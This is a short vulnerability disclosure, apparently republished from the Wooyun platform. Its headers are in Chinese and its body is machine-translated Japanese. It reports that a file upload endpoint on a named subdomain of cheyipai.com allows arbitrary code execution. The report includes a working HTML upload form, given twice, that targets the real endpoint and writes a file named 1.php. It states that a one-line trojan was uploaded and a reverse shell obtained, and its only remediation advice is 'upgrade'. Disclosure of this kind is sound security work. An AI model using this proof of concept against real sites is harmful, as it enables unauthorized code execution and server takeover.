Getshell_html/css_WEB-ITnose

漏洞标题	车易拍某站Getshell
相关厂商	cheyipai.com
漏洞作者	荒废的腰子
提交时间	2016-03-28 11:03
公开时间	2016-04-02 11:10
漏洞类型	文件上传导致任意代码执行
危害等级	高
自评Rank	15
漏洞状态	漏洞已经通知厂商但是厂商忽略漏洞
Tags标签	getshell, 任意文件上传

脆弱性の詳細

ファイルをアップロードできる場所があります

http://imo.cheyipai.com/file/ NDisk/write .php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>

1 文のトロイの木馬をアップロード

シェルのリバウンドに成功しました

脆弱性の証拠:

ファイルをアップロードできる場所があります

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>

一文をアップロードするトロイの木馬

シェルのリバウンドに成功しました

修復計画:

アップグレード

著作権表示: 転載元を示してください: Wasted Kidney @ Wuyun

[この記事の著作権はSafe Pulseに属しており、許可なく複製することはできません。この記事は著者の意見を表明しているだけです。異なる意見がある場合は、SecPulse WeChat ID: SecPulse を追加して連絡してください。 】